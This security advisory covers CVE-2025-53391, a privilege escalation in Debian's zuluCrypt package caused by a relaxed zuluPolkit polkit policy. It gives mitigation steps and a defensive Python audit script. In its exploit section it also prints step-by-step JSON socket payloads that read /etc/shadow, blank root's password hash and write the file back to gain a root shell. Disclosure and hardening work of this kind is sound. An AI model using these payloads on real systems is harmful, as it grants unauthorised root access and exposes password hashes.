A severe vulnerability (CVE-2025-53391) discovered in Debian's packaging of the disk encryption tool zuluCrypt enables local attackers to gain full root privileges. The flaw stems from a Debian-specific patch that relaxed the security restrictions on zuluPolkit, the package's privileged helper tool.
In 2019, a Debian patch modified zuluPolkit’s polkit policy to allow non-admin users to run it. Originally, only users with auth_admin privileges (typically admins) could use the tool. The patch changed this to auth_self, meaning any authenticated user could trigger it.
This change created a privilege escalation path. zuluPolkit executes high-risk operations as root, including reading/writing arbitrary files and running commands. By design, it deletes any specified file and replaces it with a UNIX socket. Attackers exploit this to overwrite system files like /etc/shadow.
Technical Breakdown: zuluPolkit
zuluPolkit is a background service for zuluCrypt (a GUI disk encryption tool). It handles privileged tasks like decrypting storage devices. It runs as root after user authentication via polkit.
How it works:
A user runs: pkexec /usr/bin/zuluPolkit /path/to/socket
zuluPolkit prompts for a “token” (an authentication cookie).
It deletes the specified file, creates a UNIX socket, and listens for JSON commands.
Commands include:
Read: Outputs any file’s content.
Write: Overwrites any file.
exit or whitelisted shell commands.
Is it installed by default?
No. It’s installed only if users explicitly add zulucrypt or zulucrypt-gui. Default Debian setups aren’t affected unless these packages are added.
The Exploit:
Aaron Rainbolt (reporter) demonstrated the attack on Debian 12:
1- As a non-admin user, run pkexec zuluPolkit /zulu-polkit (entering the user’s password).
2- Send a JSON payload via the UNIX socket to Read /etc/shadow:
{
"cookie": "attacker_token",
"path": "/etc/shadow",
"command": "Read"
}
3- Modify the dumped /etc/shadow to remove root’s password hash.
4- Write the modified version back:
{
"cookie": "attacker_token",
"path": "/etc/shadow",
"data": "root::[...]",
"command": "Write"
}
5- Run su to get a root shell instantly.
Affected Versions:
Debian 11 (Bullseye) and later, including 12 (Bookworm) and unstable (Sid).
Versions before Debian 10 (Buster) are unaffected.
Mitigation:
Debian has assigned CVE-2025-53391. Until a fix is released:
1- Uninstall zulucrypt and zulucrypt-gui if unused:
sudo apt remove zulucrypt*
2- If required, restrict polkit to admin-only: Revert the patch by changing auth_self back to auth_admin in /usr/share/polkit-1/actions/org.zulucrypt.policy.
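To check whether a host's policy still carries the relaxed setting, and to see what the revert looks like, here is an added Python audit (not from the article or the zuluCrypt project; the sample policy and its action id are constructed, and the real action id inside org.zulucrypt.policy may differ):

```python
"""Audit a polkit .policy file for defaults a non-admin user can satisfy
(auth_self / yes) and produce a hardened copy with auth_admin.
Added example; the sample policy and its action id are constructed."""
import sys
import xml.etree.ElementTree as ET

# Any of these on a helper that runs as root is the condition the article
# describes: an ordinary local user can authorise the action themselves.
WEAK = {"yes", "auth_self", "auth_self_keep"}
ELEMENTS = ("allow_any", "allow_inactive", "allow_active")

# Constructed sample mirroring the shape of the 2019 Debian patch.
SAMPLE_POLICY = """<policyconfig>
  <action id="org.example.zulupolkit">
    <description>Run zuluPolkit as root</description>
    <defaults>
      <allow_any>no</allow_any>
      <allow_inactive>no</allow_inactive>
      <allow_active>auth_self</allow_active>
    </defaults>
  </action>
</policyconfig>"""

def _weak_defaults(root):
    """Yield (action id, element) for every default whose value is in WEAK."""
    for action in root.iter("action"):
        defaults = action.find("defaults")
        for name in ELEMENTS:
            el = defaults.find(name) if defaults is not None else None
            if el is not None and (el.text or "").strip() in WEAK:
                yield action.get("id"), el

def weak_actions(policy_xml):
    """Return (action id, element name, value) tuples for audit output."""
    root = ET.fromstring(policy_xml)
    return [(aid, el.tag, el.text.strip()) for aid, el in _weak_defaults(root)]

def harden(policy_xml):
    """Return the policy with every weak default reverted to auth_admin."""
    root = ET.fromstring(policy_xml)
    for _, el in _weak_defaults(root):
        el.text = "auth_admin"
    return ET.tostring(root, encoding="unicode")

if __name__ == "__main__":
    # Usage: python3 audit.py /usr/share/polkit-1/actions/org.zulucrypt.policy
    text = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_POLICY
    for aid, name, value in weak_actions(text):
        print(f"{aid}: <{name}> is {value}; revert to auth_admin")
```

Files under /usr/share/polkit-1/actions are package-owned, so a later zulucrypt upgrade can overwrite a manual edit; re-run the audit after upgrades. The hardened output omits the XML declaration and DOCTYPE, so use it to see the intended change rather than writing it back verbatim.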
Final Advice
Monitor for Debian security updates. Avoid unnecessary privileged tools on multiuser systems. Systems without zulucrypt are safe.